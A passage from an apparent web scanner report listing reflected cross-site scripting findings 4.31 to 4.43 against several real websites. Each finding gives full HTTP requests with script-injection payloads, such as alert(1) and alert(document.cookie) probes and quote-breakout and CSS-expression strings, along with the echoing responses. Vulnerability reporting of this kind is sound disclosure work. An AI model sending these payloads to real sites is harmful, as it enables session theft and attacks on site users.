Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:05 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:04 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D28b430f0e9bc5adec4344fe7df81b61d%26exp%3D1366766585%26v%3D2; expires=Wed, 24-Apr-2013 01:23:05 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D28b430f0e9bc5adec4344fe7df81b61d%26exp%3D1366766585%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 01:23:05 GMT; path=/; domain=.snap.com
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 03:23:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 15266

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...
ain_js/v6.59/";
s.parentNode.insertBefore(js, s);
var js = document.createElement("script");
js.type = "text/javascript";
js.src = "http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c737587005<script>alert(1)</script>538521ad19a/" + SNAP_COM.hash(document.location.href) +
"/auto_shot.js?sz="+SNAP_COM.size()+"&lm="+escape(document.lastModified)+"&size=small&accept=shots";
s.parentNode.insertBefore(js, s);
}
SNAP_
...[SNIP]...

4.31. http://shots.snap.com/snap_shots.js [preview_trigger parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /snap_shots.js

Issue detail

The value of the preview_trigger request parameter is copied into the HTML document as plain text between tags. The payload d95c1<script>alert(1)</script>aa502bc404 was submitted in the preview_trigger parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snap_shots.js?ap=1&si=0&key=6e8afd4f63cdc7886a3f718aa78c7375&sb=0&link_icon=on&oi=0&cl=0&po=0&th=green&preview_trigger=icond95c1<script>alert(1)</script>aa502bc404&domain=www.slaviks-blog.com HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:27:49 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:27:48 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D1db8e18d71451b093b52af603969a253%26exp%3D1366766869%26v%3D2; expires=Wed, 24-Apr-2013 01:27:49 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D1db8e18d71451b093b52af603969a253%26exp%3D1366766869%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 01:27:49 GMT; path=/; domain=.snap.com
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 03:27:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 15260

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...
ow_internal:false,preview_only:false,preview_type:null,no_rss:0,rich_only:false,plugin:false,rescan_after_load:false,thumbnail_precrawl:0,show_link_icon:false,link_icon_types:true,preview_trigger:"icond95c1<script>alert(1)</script>aa502bc404",image_trigger:false,shots_domain_match:null,shot_check:1,search_type:"spasense",redirect_param:null,client_ip:"173.193.214.243",user_agent:"Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29
...[SNIP]...

4.32. http://spamlaws.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b731%3balert(1)//58a9bba0f77 was submitted in the jscallback parameter. This input was echoed as 8b731;alert(1)//58a9bba0f77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /al.asp?ts=20110426142115&adid=0%2C0%2C0%2C0%2C4513%2C0&cc=us&di=31742909%2C31742907%2C31742978%2C31326997%2C31051141%2C31326990&hk=1&ipid=10143&mh=b5e073b8ec12fc1181fc2fd3b1a46a79&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=35e167e1c66fee62be98fe397190a726&pvu=59196390591647FA9372FACB8C10DBA5&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=327%2C302%3B265%2C378%3B722%2C499%3B581%2C620%3B401%2C989%3B319%2C1289%3B&prf=ll%3A5003%7Cintl%3A6792%7Cpreprochrome%3A2%7Cgetconchrome%3A56%7Cadvint%3A6889%7Cadvl%3A6889%7Ctl%3A9596&jscallback=$iTXT.js.callback18b731%3balert(1)//58a9bba0f77 HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:54 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Tue, 26 Apr 2011 14:21:54 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback18b731;alert(1)//58a9bba0f77();}catch(e){}

4.33. http://spamlaws.us.intellitxt.com/iframescript.jsp [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /iframescript.jsp

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d361"><script>alert(1)</script>526ac49452b was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D07d361"><script>alert(1)</script>526ac49452b HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/html
Content-Length: 205
Date: Tue, 26 Apr 2011 14:21:10 GMT
Age: 0
Connection: keep-alive

<html><body><script src="http://pixel.intellitxt.com/pixel.jsp?id=2773,2759,2761,2791&type=script&ipid=10143&sfid=07d361"><script>alert(1)</script>526ac49452b" language="javascript"></script></body></
...[SNIP]...

4.34. http://spamlaws.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5c8c'-alert(1)-'43cbe071eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intellitxt/front.asp?ipid=10143&b5c8c'-alert(1)-'43cbe071eb6=1 HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviQskDAA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki9ubwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:12 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki9ubwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:12 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:21:12 GMT
Age: 0
Connection: keep-alive
Content-Length: 11733

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
ogle,aol,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://spamlaws.us.intellitxt.com';$iTXT.js.pageQuery='ipid=10143&b5c8c'-alert(1)-'43cbe071eb6=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

4.35. http://spamlaws.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2cbe2%3balert(1)//ce669c8cced was submitted in the jscallback parameter. This input was echoed as 2cbe2;alert(1)//ce669c8cced in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v4/init?ts=1303827671318&pagecl=6516&fv=10&muid=&refurl=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&ipid=10143&jscallback=$iTXT.js.callback02cbe2%3balert(1)//ce669c8cced HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgAAAAAAAAAAAAEKCgc1; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:22:40 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:22:40 GMT
Age: 0
Connection: keep-alive
Content-Length: 18079

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
et('initskip',0);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback02cbe2;alert(1)//ce669c8cced({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

4.36. http://spamlaws.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7e30"-alert(1)-"30a0183f25f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v4/init?ts=1303827671318&pagecl=6516&fv=10&muid=&refurl=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&ipid=10143&jscallback=$iTXT.js.callback0&e7e30"-alert(1)-"30a0183f25f=1 HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgAAAAAAAAAAAAEKCgc1; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:22:46 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:22:46 GMT
Age: 0
Connection: keep-alive
Content-Length: 18060

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
OSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16","REGIONNAME":"Texas","muid":"","city":"Dallas","e7e30"-alert(1)-"30a0183f25f":"1","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.spamlaws.com/spam-blocker.html","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.pa
...[SNIP]...

4.37. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 88f92<script>alert(1)</script>469cca08b69 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//xss.cx/2011/04/26/dork/accountsnapcom/reflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html88f92<script>alert(1)</script>469cca08b69 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/26/dork/accountsnapcom/reflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Tue, 26 Apr 2011 11:34:34 GMT
Via: NS-CACHE: 100
Etag: "f826c2a942d9d8c66eb57c86894cab9044a8141e"
Content-Length: 212
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Tue, 26 Apr 2011 11:44:33 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://xss.cx/2011/04/26/dork/accountsnapcom/reflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html88f92<script>alert(1)</script>469cca08b69", "diggs": 0});

4.38. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 863f5(a)6ceac5198b was submitted in REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C863f5(a)6ceac5198b/script%3Ecf590911e53/securimage/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&amp;bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 138

Bad file./var/www/html/inc5c69f%3Cscript%3Ealert(document.cookie)%3C863f5(a)6ceac5198b/script%3Ecf590911e53/securimage/securimage_play.swf

4.39. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 62283<script>alert(1)</script>7bc530bad97 was submitted in REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /62283<script>alert(1)</script>7bc530bad97/script%3Ecf590911e53/securimage/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&amp;bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 116

Bad file./var/www/html/62283<script>alert(1)</script>7bc530bad97/script%3Ecf590911e53/securimage/securimage_play.swf

4.40. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5721a(a)e0872078c2d was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e535721a(a)e0872078c2d/securimage/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&amp;bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 139

Bad file./var/www/html/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e535721a(a)e0872078c2d/securimage/securimage_play.swf

4.41. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 3 is copied into the application's response. The payload da714(a)a22d71e7157 was submitted in the REST URL parameter 3 and was echoed unmodified, parentheses included, which is why the scanner reports a possible unquoted JavaScript expression context.

In the captured response, however, the reflection sits in a one-line "Bad file." error served as text/html, and the <script> element placed in the first path segment is echoed still percent-encoded (%3Cscript%3E). That is the obstacle the scanner ran into: an attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. Examine the application's behaviour manually for input validation or other obstacles before treating this as exploitable. As in 4.40, the error message also discloses the document root (/var/www/html/).

Request

GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimageda714(a)a22d71e7157/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 139

Bad file./var/www/html/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimageda714(a)a22d71e7157/securimage_play.swf

4.42. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 4 is copied into the application's response. The payload 4c759(a)e999cc0505a was submitted in the REST URL parameter 4 and was echoed unmodified, parentheses included, which is why the scanner reports a possible unquoted JavaScript expression context.

In the captured response, however, the reflection sits in a one-line "Bad file." error served as text/html, and the <script> element placed in the first path segment is echoed still percent-encoded (%3Cscript%3E). That is the obstacle the scanner ran into: an attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. Examine the application's behaviour manually for input validation or other obstacles before treating this as exploitable. As in 4.40, the error message also discloses the document root (/var/www/html/).

Request

GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf4c759(a)e999cc0505a?audio=/inc/securimage/securimage_play.phpx&bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 139

Bad file./var/www/html/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf4c759(a)e999cc0505a

4.43. http://www.afreshbunch.com/ [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 724aa"style%3d"x%3aexpr/**/ession(alert(1))"0d3fc4acadb was submitted in the email parameter. This input was echoed as 724aa"style="x:expr/**/ession(alert(1))"0d3fc4acadb in the application's response.

